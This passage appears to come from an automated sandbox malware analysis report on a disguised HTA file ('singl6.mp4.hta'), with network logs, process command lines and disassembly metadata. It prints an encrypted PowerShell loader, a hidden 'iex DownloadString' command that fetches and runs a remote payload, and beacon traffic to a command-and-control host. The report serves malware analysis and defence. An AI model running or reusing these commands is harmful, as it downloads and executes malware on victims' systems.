                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: fd 17 ca 94 8e 08 08 4d 7f 81 3c 30 1f 32 28 54 36 bc 7b 14 0b 72 24 81 7e d5 71 68 f3 1c e5 6b 89 64 19 07 8f 15 cb 94 ae 36 2c 12 f2 26 6f a7 4c f7 dd b3 db ee 0e 41 c2 d8 a3 14 09 34 cd 7c 27 ab 30 50 13 15 de 5f 02 4c de 66 c0 d4 2e c2 91 87 41 74 a9 41 97 5d 5b f3 d8 54 22 7a 61 2b 2b 6b 97 4e 96 b3 32 9e d4 8c 2a d1 03 fb 91 ee c0 12 1f 23 d0 7e ae 9f cc b8 ae a1 b7 de 62 bc 36 7f d3 ec cb c5 f5 c1 0f 6c b1 e1 15 c0 97 1f fd bc 2e b3 03 2e 0c 0a 6a fc f4 59 8e 19 34 8d 88 3d 79 61 d1 83 f1 c7 91 f0 4a 7f 55 1f 4c 91 00 86 97 1a 38 5d a7 8c 8a 4d 8b d0 00 7e 85 3a 42 61 be 50 0f 8a 6c aa a6 6c ba 33 36 31 01 3f 91 40 53 11 37 7f 55 29 ec 84 94 df 79 af 62 ed 69 61 a1 d2 8d 94 81 9a c7 a9 0b 29 0c ab f4 58 a7 6b ac b9 bc 44 39 47 15 35 96 93 95 78 fc
                                                                      Data Ascii: M<02(T6{r$~qhkd6,&oLA4|'0P_Lf.AtA][T"za++kN2*#~b6l..jY4=yaJUL8]M~:BaPll361?@S7U)ybia)XkD9G5x
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: e3 0b 65 85 f5 04 f0 51 d5 70 d2 9f 89 fb f1 a4 da 86 3d d6 65 c8 70 3e f6 39 88 61 89 44 f0 84 9e 91 1a e6 da cb 5b fe f0 01 88 71 3e a1 3e bd 39 c6 c7 c9 01 22 a9 2d 1c 00 5a a6 ee 54 d7 7d a0 78 f7 f8 4f 1b 89 e8 f7 37 37 cb ee a3 b4 61 05 da dc 3c 34 f4 b2 ab b1 6a c7 81 ef 1b 06 fc ce 78 4c 25 2a ad cf 66 fe 12 24 ea 73 d1 c0 af eb 3c 29 10 71 7d 14 35 09 5d df 65 fd 9f c6 14 6b 56 9d a1 65 67 8b 39 c2 27 2e f7 4e fa 48 d6 48 d6 91 04 d9 ab a6 3c 37 98 80 f4 b7 c4 a7 df 99 c1 35 19 38 47 46 d1 02 d6 45 26 ae 21 a4 27 0d b1 5a fa 18 6c 8d 51 2c 4f e6 a7 3e dd 95 d7 4e 17 9f fb 3e ab cf 3a e5 de d0 bc 63 7f 7f 47 92 64 2b 4f 15 67 2a 02 c5 a6 54 cd 49 c4 7e b0 7b f7 ee 56 3b fb cc c2 97 57 d9 d3 26 86 c0 ef a4 7e 6a 23 a3 da 46 a3 81 4a 51 17 51 42 1c
                                                                      Data Ascii: eQp=ep>9aD[q>>9"-ZT}xO77a<4jxL%*f$s<)q}5]ekVeg9'.NHH<758GFE&!'ZlQ,O>N>:cGd+Og*TI~{V;W&~j#FJQQB
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: 16 ef 7e c6 ce de 7a 85 57 72 9d 49 bf 43 ff 1f 26 7b 06 22 ed c3 fd ff 9b 0d e4 f2 b8 bd 30 d4 82 05 27 4d d9 03 25 3c 7d 4d 0c 69 93 f4 6e 1b af 17 b8 e8 e9 66 aa 9d bc 47 19 47 c5 7f 3e 02 c3 a9 cb dc 55 73 72 af c3 c7 9d e8 f4 75 82 8b 23 10 82 0f 5c 2b b6 bb 63 66 b7 7e c9 3e 55 ca 82 22 ff 18 6f 88 71 4b 9b bb 05 8a 8d 40 5e f1 0d 2b 18 f5 1c 3e d9 8b 4a e9 eb b9 9f 7a 43 00 6d 0d f4 cf a3 7b 85 c1 75 b6 9e 04 c4 b7 6a b1 2a 85 c1 77 fe d9 17 d9 3a 9d 82 01 3a df 04 92 63 54 9c 28 dd 42 a9 fb 21 25 76 8e 3a 78 21 8b bb 24 97 2a c2 7c 34 d0 61 19 39 6f da 60 0a 23 5a d2 c6 ef 1c 85 93 25 c0 7b 61 c6 ae 54 8d 58 16 50 57 08 a4 88 43 f8 6e bf cc a5 24 18 5b 56 7f 86 76 18 ac 92 13 4f 93 cc 09 83 39 c7 6c 6d 8f 30 50 42 e2 e4 64 2f 0c 8c 1f 1e c3 ae 86
                                                                      Data Ascii: ~zWrIC&{"0'M%<}MinfGG>Usru#\+cf~>U"oqK@^+>JzCm{uj*w::cT(B!%v:x!$*|4a9o`#Z%{aTXPWCn$[VvO9lm0PBd/
                                                                      2024-12-24 07:31:09 UTC15331OUTData Raw: 05 dd 2e 03 a5 af 99 d6 56 c6 01 1d 37 ef e5 d4 10 e3 d0 2f f6 bd 5c 99 70 b8 bf 5d e1 1c 26 4c 2a ff 71 58 be 2d 26 08 e0 0b 7a 84 3e 9d 92 bc b0 1a d4 ef f9 75 c1 2d d5 81 a3 90 52 3e 4a f3 75 77 72 89 1f 0b fd bd 8e ef 9b a4 e9 76 a4 2e 8f 7c 7d 94 1e d8 6d c3 19 28 dd e0 2a 8c 85 6a 35 94 0e 72 02 05 51 43 98 e0 dc 18 74 15 a9 a6 a7 20 fd db 48 8d 0d fb d1 c6 37 13 f6 0e 6e 0a 2d 34 60 5d ec a9 0f 2f 70 29 db ef 8f ae f4 0b 0f 62 45 2a 94 ea 74 a6 6c 53 67 68 e0 25 29 82 60 51 79 7e 34 7a 1f 2e 38 e7 df 4a 4f 04 9a fe 50 e8 4e 3c 5c 65 70 bd 7c 97 88 69 b8 5a 46 e7 19 ec 39 27 f3 f7 b2 1e 7f 54 cc d5 4a 7e 39 87 ae 5d 64 b5 59 69 94 4a 3a 07 54 1b b1 fa bc 67 e9 78 f9 6f 8a 4c ff 74 69 2d 30 ad 36 6c 50 4c 98 3f c5 c9 e5 b4 df 71 df 21 00 ac 59 7b ef
                                                                      Data Ascii: .V7/\p]&L*qX-&z>u-R>Juwrv.|}m(*j5rQCt H7n-4`]/p)bE*tlSgh%)`Qy~4z.8JOPN<\ep|iZF9'TJ~9]dYiJ:TgxoLti-06lPL?q!Y{
                                                                      2024-12-24 07:31:11 UTC1145INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:31:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=uql603up2e66187dgtggjpdrlr; expires=Sat, 19 Apr 2025 01:17:50 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LKVavMHbH4FVsMohbt28C4qkzHZUXkTwR9BBFZXFrs%2Fsf1jx2s%2Bze%2Fe2ps6HXd%2BR3MVBuqtyLPQW7%2FS%2B1C69PoUwN8qoqA%2BiiELmXjupiHkjtvfjBq7aobsLpqN%2FCR5Ls87cRFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee3e10a068c93-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1983&rtt_var=777&sent=314&recv=594&lost=0&retrans=0&sent_bytes=2845&recv_bytes=571790&delivery_rate=1379962&cwnd=192&unsent_bytes=0&cid=399663899b054f59&ts=2394&x=0"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.649996104.21.64.14436648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:31:13 UTC266OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 83
                                                                      Host: surmisehotte.click
                                                                      2024-12-24 07:31:13 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 26 6a 3d 26 68 77 69 64 3d 46 46 32 41 41 36 42 43 44 35 34 42 35 43 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                      Data Ascii: act=get_message&ver=4.0&lid=yJEcaG--singl6&j=&hwid=FF2AA6BCD54B5C55AC8923850305D13E
                                                                      2024-12-24 07:31:13 UTC1131INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:31:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=23e79ta5dijuagk5qclmsthb9p; expires=Sat, 19 Apr 2025 01:17:52 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPKvLQ5LeSC9hxYPws8XW377TZO%2B%2BXNXjRrNNQ3WiA1oRTQfTRePR2ScuUSVFIq7j92pVRXmTGzfuo%2FFyS8One3%2FXrBII1kQq%2FuSRYVa6dvNKfk3ZR1fRq5gpjuJGrgMWIQykRY%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee3f83dfa7c6c-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1931&rtt_var=759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=985&delivery_rate=1409266&cwnd=189&unsent_bytes=0&cid=08ca00fc821140b1&ts=765&x=0"
                                                                      2024-12-24 07:31:13 UTC54INData Raw: 33 30 0d 0a 58 6f 58 5a 75 6d 30 4c 77 76 33 72 6e 78 45 4b 69 79 4e 46 79 6b 38 62 43 70 75 50 55 4f 50 4f 72 42 59 6d 68 57 77 39 50 4e 55 46 32 41 3d 3d 0d 0a
                                                                      Data Ascii: 30XoXZum0Lwv3rnxEKiyNFyk8bCpuPUOPOrBYmhWw9PNUF2A==
                                                                      2024-12-24 07:31:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:02:28:57
                                                                      Start date:24/12/2024
                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\singl6.mp4.hta"
                                                                      Imagebase:0xad0000
                                                                      File size:13'312 bytes
                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:02:28:59
                                                                      Start date:24/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1047B4CA5F5C3136955E90288D0CF771D4EDB3C9D787D81A22FA1D19D50DBC83BC87F1DCA44B36AD85C9385793AFD75CBEBC74C6D267B19EA7B471F3AA348B616B1DBAA4A77832B7A57A91B94748F0F93B2D08F4BC95283A1D6EF07728C7091AF8F56E69DE9EA56CA801CD0A7E62F5CDFAE51540ACFCB025D5E940A9075C8DA17758CDC6A94DC6B6D01EB23E488BA9A1371F56D19500FE2B8FB10BA9B54801012917F04D36326F74A108C2D0B9AD4FB51DA2F8BA2777F37564F5B6B6E926E7121E3462FF03AAE5966558C3283C1548AC5074916DB8A685025AD4BB17E389AAE7C4C89FE3D49A5B7CBB890755B7CBC935D1185DE2AFF91099EC236AF765EB3039E9561D484E095F1874255D784C682A4B088C008559D9426482954EA469C7570756');$BIAG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((cDnCn('4C50475A727A72534D6D4F70764E7061')),[byte[]]::new(16)).TransformFinalBlock($Lhmk,0,$Lhmk.Length)); & $BIAG.Substring(0,3) $BIAG.Substring(129)
                                                                      Imagebase:0xeb0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:02:28:59
                                                                      Start date:24/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:02:29:07
                                                                      Start date:24/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
                                                                      Imagebase:0xeb0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:02:29:07
                                                                      Start date:24/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:02:30:52
                                                                      Start date:24/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                      Imagebase:0xeb0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 0AFE1000 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2260823437.000000000AFE1000.00000010.00000800.00020000.00000000.sdmp, Offset: 0AFE1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_afe1000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !
                                                                        • API String ID: 0-2657877971
                                                                        • Opcode ID: b47959032815fa73433abf74e248a1d5dd16d1478a99293581f08b65178f5260
                                                                        • Instruction ID: d187db7eed295425bd749ecc70f9a00c24417e754c0041f2f282e885c7418b07
                                                                        • Opcode Fuzzy Hash: b47959032815fa73433abf74e248a1d5dd16d1478a99293581f08b65178f5260
                                                                        • Instruction Fuzzy Hash: 4B413431B04315ABDB70CEA9C882BADB7D9EB94754F444368EE5697391D3788C008BA6
                                                                        Function 068A0F9F Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2260870946.00000000068A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_68a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction ID: 97c7bbf23744717549ceccf8a364b34624830614e7f9df5203b50ee452c74b8c
                                                                        • Opcode Fuzzy Hash: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 068A0FAF Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2260870946.00000000068A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_68a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction ID: 97c7bbf23744717549ceccf8a364b34624830614e7f9df5203b50ee452c74b8c
                                                                        • Opcode Fuzzy Hash: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 068A0FBF Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2260870946.00000000068A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_68a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction ID: 97c7bbf23744717549ceccf8a364b34624830614e7f9df5203b50ee452c74b8c
                                                                        • Opcode Fuzzy Hash: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 068A0FCF Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2260870946.00000000068A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_68a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction ID: 97c7bbf23744717549ceccf8a364b34624830614e7f9df5203b50ee452c74b8c
                                                                        • Opcode Fuzzy Hash: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 068A0FC7 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2260870946.00000000068A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_68a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction ID: 97c7bbf23744717549ceccf8a364b34624830614e7f9df5203b50ee452c74b8c
                                                                        • Opcode Fuzzy Hash: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 068A0FE7 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2260870946.00000000068A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_68a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction ID: 97c7bbf23744717549ceccf8a364b34624830614e7f9df5203b50ee452c74b8c
                                                                        • Opcode Fuzzy Hash: 008bba5647dbdc467b8008402277c6112ae45ec5527a47917ab0894adfd3a265
                                                                        • Instruction Fuzzy Hash:

                                                                        Executed Functions

                                                                        Function 00E9CB78 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V@n
                                                                        • API String ID: 0-2463972958
                                                                        • Opcode ID: f318836e442a3154b67b02a4d5c95403b1d67c14941cb428074dd8556d7a3cad
                                                                        • Instruction ID: 50c68f7e4ca7f28f78c8e564d04bd501c5ddb2fade186c12c8911c6321760078
                                                                        • Opcode Fuzzy Hash: f318836e442a3154b67b02a4d5c95403b1d67c14941cb428074dd8556d7a3cad
                                                                        • Instruction Fuzzy Hash: 8DB14C70E002098FDF14DFA9C8857EDBBF2AF88718F249529D819B7294EB749845CB81
                                                                        Function 00E9D448 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ff95d4d1f89dcead0fd6d522c073c34bc782ecbc420c7a4d4eb1ccd40e61539
                                                                        • Instruction ID: 0e5fbc255ad95c82fedc9e6ccafff5d8a219671b30873a36e14f2b3d461bfef3
                                                                        • Opcode Fuzzy Hash: 6ff95d4d1f89dcead0fd6d522c073c34bc782ecbc420c7a4d4eb1ccd40e61539
                                                                        • Instruction Fuzzy Hash: 97B13D70E04219CFDF14CFA9D88579DBBF2AF88718F249129D815FB294EB749845CB81
                                                                        Function 00E99088 Relevance: 6.8, Strings: 5, Instructions: 522COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8N@n$h]@n$h]@n$h]@n$I@n
                                                                        • API String ID: 0-1610025474
                                                                        • Opcode ID: 391467d018a2b541a022532e34a80161e621276a18ff167c86bb05110bc2e0db
                                                                        • Instruction ID: 4927c003bf52351e833ef23fbf0f6afbdac40f8f90324621c4b4749311e07fb8
                                                                        • Opcode Fuzzy Hash: 391467d018a2b541a022532e34a80161e621276a18ff167c86bb05110bc2e0db
                                                                        • Instruction Fuzzy Hash: AC225034B012148FCB25EB75D854AEEB7B6AF89304F1494ADD40AAB361DF359E81CF81
                                                                        Function 071E1ED0 Relevance: 5.7, Strings: 4, Instructions: 726COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2255293987.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_71e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (fi$(fi$(fi$(fi
                                                                        • API String ID: 0-1040940215
                                                                        • Opcode ID: 97a8a069b5e0b158699f444f7007aadf45bc803e9fc65f5561215c6eca91a75b
